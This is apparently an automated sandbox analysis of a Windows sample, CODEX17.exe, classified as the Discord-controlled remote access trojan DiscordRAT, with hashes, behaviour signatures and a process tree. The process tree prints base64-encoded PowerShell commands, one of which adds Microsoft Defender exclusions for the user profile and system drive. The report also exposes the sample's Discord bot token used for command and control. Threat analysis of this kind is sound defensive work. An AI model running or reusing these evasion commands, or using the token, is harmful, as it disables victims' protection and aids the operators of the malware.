Analysis

  • max time kernel
    13s
  • max time network
    14s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    11-12-2024 14:13

General

  • Target

    CODEX17.exe

  • Size

    307KB

  • MD5

    53cc7337eed07bbbe0172f0b64bc6245

  • SHA1

    9b0ac7e0eaffdb6ed8af1501939f40bd798f6be0

  • SHA256

    1e5a4524dab6f1e4125043a7cdcfb6874c32a0514941ec4a90211f53efeef058

  • SHA512

    ff2ec069d7877fdc646dfaaba4d9525ef71c04c93936accdd1bc1bfe9ab873ab27cceb9c2d34d25f3b3e6d4e6bb4ece707b797d2f5672d73583e21a361fb333d

  • SSDEEP

    6144:m2EUicOFEG3AFDmDbpM6/XETGNNjyhRJNJC32XENQ8NvN:m2rOXTfpNg+

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTMwODQxMjQ0MjIyODk1MzIwMA.GV9W16.iYVXo71VO-dFm-6aOmZjrpuYUGqFHWVGtkvM5Q

  • server_id

    1316071968298111026

Signatures

  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Discordrat family
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\CODEX17.exe
    "C:\Users\Admin\AppData\Local\Temp\CODEX17.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3272
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAaABrACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGQAaABiACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAaABoAG4AIwA+AA=="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2088
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAdQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAaAB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAZQB0ACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4652
    • C:\Users\Admin\AppData\Local\Temp\Client-built.exe
      "C:\Users\Admin\AppData\Local\Temp\Client-built.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4252

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d0c46cad6c0778401e21910bd6b56b70

    SHA1

    7be418951ea96326aca445b8dfe449b2bfa0dca6

    SHA256

    9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02

    SHA512

    057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    17KB

    MD5

    7b995959b3b9399f14a1e1a3dc000fd6

    SHA1

    2b3c3975298c086465788028a7b4bbdf83437e4b

    SHA256

    46211ee1fcedcf49ec348509edf6a73526e80eb95f800073a01e5bcca6e38236

    SHA512

    fef9ff15b4ab89ae1a64f6b1071e17188009f0b581eb318754eab95b5c57269c4b8e6e7f9afc75629776bde6620e2e4bc7ebda225297afc125850cd91056c658

  • C:\Users\Admin\AppData\Local\Temp\Client-built.exe

    Filesize

    78KB

    MD5

    eef37e61081aca867be51dab8d02c732

    SHA1

    b58736f3eb07dedd144e61a8e38802de1c15b947

    SHA256

    d74aed2a699c0ad2be01c761918ddcd5486bcf331a0a54a02bed4e073bdb39a8

    SHA512

    08555aeb12b54264370e1e4154a7509efe21b84fbe5aa1fd4c322b22886a149adeaa3ff7e9b1b54f9c1ccd1dcc9ae32e5702c876b9ed1b58f63a9a1c61425078

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aez1qmac.m0q.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2088-17-0x0000000005CA0000-0x0000000005CBE000-memory.dmp

    Filesize

    120KB

  • memory/2088-20-0x00000000061C0000-0x00000000061DA000-memory.dmp

    Filesize

    104KB

  • memory/2088-6-0x0000000005700000-0x0000000005766000-memory.dmp

    Filesize

    408KB

  • memory/2088-7-0x0000000005770000-0x00000000057D6000-memory.dmp

    Filesize

    408KB

  • memory/2088-4-0x0000000072EE0000-0x0000000073691000-memory.dmp

    Filesize

    7.7MB

  • memory/2088-16-0x00000000057E0000-0x0000000005B37000-memory.dmp

    Filesize

    3.3MB

  • memory/2088-67-0x0000000072EEE000-0x0000000072EEF000-memory.dmp

    Filesize

    4KB

  • memory/2088-18-0x0000000005CE0000-0x0000000005D2C000-memory.dmp

    Filesize

    304KB

  • memory/2088-19-0x00000000072F0000-0x000000000796A000-memory.dmp

    Filesize

    6.5MB

  • memory/2088-5-0x0000000004F10000-0x0000000004F32000-memory.dmp

    Filesize

    136KB

  • memory/2088-21-0x0000000007F20000-0x00000000084C6000-memory.dmp

    Filesize

    5.6MB

  • memory/2088-22-0x0000000007090000-0x0000000007122000-memory.dmp

    Filesize

    584KB

  • memory/2088-3-0x0000000072EE0000-0x0000000073691000-memory.dmp

    Filesize

    7.7MB

  • memory/2088-72-0x0000000072EE0000-0x0000000073691000-memory.dmp

    Filesize

    7.7MB

  • memory/2088-0-0x0000000072EEE000-0x0000000072EEF000-memory.dmp

    Filesize

    4KB

  • memory/2088-2-0x0000000005020000-0x000000000564A000-memory.dmp

    Filesize

    6.2MB

  • memory/2088-1-0x00000000024A0000-0x00000000024D6000-memory.dmp

    Filesize

    216KB

  • memory/2088-68-0x0000000072EE0000-0x0000000073691000-memory.dmp

    Filesize

    7.7MB

  • memory/4252-36-0x00007FFCFBEF3000-0x00007FFCFBEF5000-memory.dmp

    Filesize

    8KB

  • memory/4252-45-0x00000251B95F0000-0x00000251B9B18000-memory.dmp

    Filesize

    5.2MB

  • memory/4252-34-0x000002519DC60000-0x000002519DC78000-memory.dmp

    Filesize

    96KB

  • memory/4252-35-0x00000251B8370000-0x00000251B8532000-memory.dmp

    Filesize

    1.8MB

  • memory/4652-62-0x0000000007D30000-0x0000000007D45000-memory.dmp

    Filesize

    84KB

  • memory/4652-60-0x0000000007CE0000-0x0000000007CF1000-memory.dmp

    Filesize

    68KB

  • memory/4652-61-0x0000000007D20000-0x0000000007D2E000-memory.dmp

    Filesize

    56KB

  • memory/4652-56-0x0000000007970000-0x000000000798E000-memory.dmp

    Filesize

    120KB

  • memory/4652-63-0x0000000007E30000-0x0000000007E4A000-memory.dmp

    Filesize

    104KB

  • memory/4652-64-0x0000000007E10000-0x0000000007E18000-memory.dmp

    Filesize

    32KB

  • memory/4652-47-0x000000006F890000-0x000000006F8DC000-memory.dmp

    Filesize

    304KB

  • memory/4652-46-0x0000000006D60000-0x0000000006D94000-memory.dmp

    Filesize

    208KB

  • memory/4652-59-0x0000000007D70000-0x0000000007E06000-memory.dmp

    Filesize

    600KB

  • memory/4652-58-0x0000000007B50000-0x0000000007B5A000-memory.dmp

    Filesize

    40KB

  • memory/4652-57-0x00000000079A0000-0x0000000007A44000-memory.dmp

    Filesize

    656KB